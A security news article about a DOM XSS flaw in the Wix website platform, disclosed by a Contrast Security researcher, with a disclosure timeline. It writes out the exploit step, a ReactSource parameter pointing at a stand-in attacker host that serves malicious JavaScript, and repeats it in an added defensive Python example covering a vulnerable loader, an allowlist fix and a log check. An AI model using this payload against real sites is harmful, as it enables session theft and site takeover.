Have you heard of wix(.)com?
Wix.com is a cloud-based web development platform designed to let users build HTML5 and mobile websites through the company's online drag-and-drop tools.
Unfortunately, a serious XSS bug has been discovered on the platform, currently endangering millions of websites and users.
Wix(.)com has a serious XSS bug, researcher says
As reported by security researchers, the service hosts millions of websites with 87 million registered users. The scary part is that all users are currently exposed to this XSS vulnerability. It can be deployed by attackers in a worm-like manner to take over administrator accounts. Once that is done, the attackers obtain full control over the compromised websites.
The XSS vulnerability was disclosed by Matt Austin from Contrast Security. He wrote:
Wix.com has a severe DOM XSS vulnerability that allows an attacker complete control over any website hosted at Wix. Simply by adding a single parameter to any site created on Wix, the attacker can cause their JavaScript to be loaded and run as part of the target website.
A simple line of code is enough to trigger the bug
The attack can be triggered simply by adding a redirection parameter to any URL of a wix(.)com site. The result is a redirection to malicious JavaScript. See an example below:
- Add: ?ReactSource=https://evil.com to any URL for any site created on wix.com.
- Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js
These simple lines of code are enough for attackers to be sure that their JS is loaded and executed as part of the targeted website, the researcher explains. Attackers are also able to gain access to admin session cookies and resources, a very bad scenario indeed. Once a session cookie has been harvested, attackers can freely place the DOM XSS in an iframe in order to host malicious content on any website administered by that operator.
Upon success, this attack can be leveraged for malware distribution, website modification, cryptocurrency mining, altering account credentials, and so on.
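To make the root cause and the fix concrete, here is an added example (not code from Wix or from the researcher's write-up) that contrasts a loader which trusts the ReactSource parameter with a hardened loader that only honours an allowlisted origin, plus a quick hunt over constructed access-log lines for requests carrying an untrusted ReactSource value. The default CDN origin, the allowlist and the log lines are assumptions constructed for the example; only the parameter name and the script path come from the article.

```python
from urllib.parse import urlsplit, parse_qs

# Placeholder for the platform's own script CDN (constructed; not Wix's real host).
DEFAULT_SCRIPT_ORIGIN = "https://static.example.com"
TRUSTED_SCRIPT_ORIGINS = {DEFAULT_SCRIPT_ORIGIN}
SCRIPT_PATH = "/packages-bin/wixCodeInit/wixCodeInit.min.js"  # path named in the write-up

def origin_of(url):
    """scheme://host of an absolute http(s) URL, else None (exact match defeats prefix tricks)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def _requested_base(page_url):
    qs = parse_qs(urlsplit(page_url).query)
    return qs.get("ReactSource", [DEFAULT_SCRIPT_ORIGIN])[0]

def vulnerable_script_url(page_url):
    """Mirrors the bug: whatever ReactSource says becomes the origin the bootstrap script loads from."""
    return _requested_base(page_url).rstrip("/") + SCRIPT_PATH

def hardened_script_url(page_url):
    """Only an allowlisted origin may override the default; anything else falls back to the CDN."""
    base = _requested_base(page_url)
    if origin_of(base) not in TRUSTED_SCRIPT_ORIGINS:
        base = DEFAULT_SCRIPT_ORIGIN
    return base.rstrip("/") + SCRIPT_PATH

def flag_react_source_abuse(log_lines):
    """(client_ip, injected_value) for access-log requests carrying an untrusted ReactSource."""
    hits = []
    for line in log_lines:
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        qs = parse_qs(urlsplit(fields[6]).query)  # fields[6] is the request path in CLF
        for value in qs.get("ReactSource", []):
            if origin_of(value) not in TRUSTED_SCRIPT_ORIGINS:
                hits.append((fields[0], value))
    return hits

# Constructed sample access-log lines (Combined Log Format, abbreviated).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Oct/2016:10:00:01 +0000] "GET /home HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Oct/2016:10:00:02 +0000] "GET /home?ReactSource=https://evil.com HTTP/1.1" 200 512',
    '203.0.113.9 - - [28/Oct/2016:10:00:03 +0000] "GET /about?ReactSource=https://static.example.com HTTP/1.1" 200 512',
]
```

The hardened variant matches the full origin rather than a hostname prefix, so a value such as https://static.example.com.evil.com is also rejected.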
What did Wix say?
As for the communication with wix(.)com, the researcher shares the following experience:
October 10: Creates support ticket requesting security contact
October 11: Reach out to @wix on Twitter to find a security contact. Replied to use standard support. Gave details in created ticket. Ticket page no longer works. https://www.wix.com/support/html5/contact.
October 14: Received standard “We are investigating the matter and will follow up as soon as possible” reply from Wix.
October 20: Reply to ticket requesting an update. (no response)
October 27: Second request for an update. (no response)
On October 28, the researcher finally received a response stating that the
group you tried to contact (security) may not exist, or you may not have permission to post messages to the group.
Nevertheless, Wix CEO Avishai Abrahami eventually admitted that certain aspects of the platform are based on the WordPress open-source library. He claims that whatever was improved upon was released back to the community, ZDNet reports.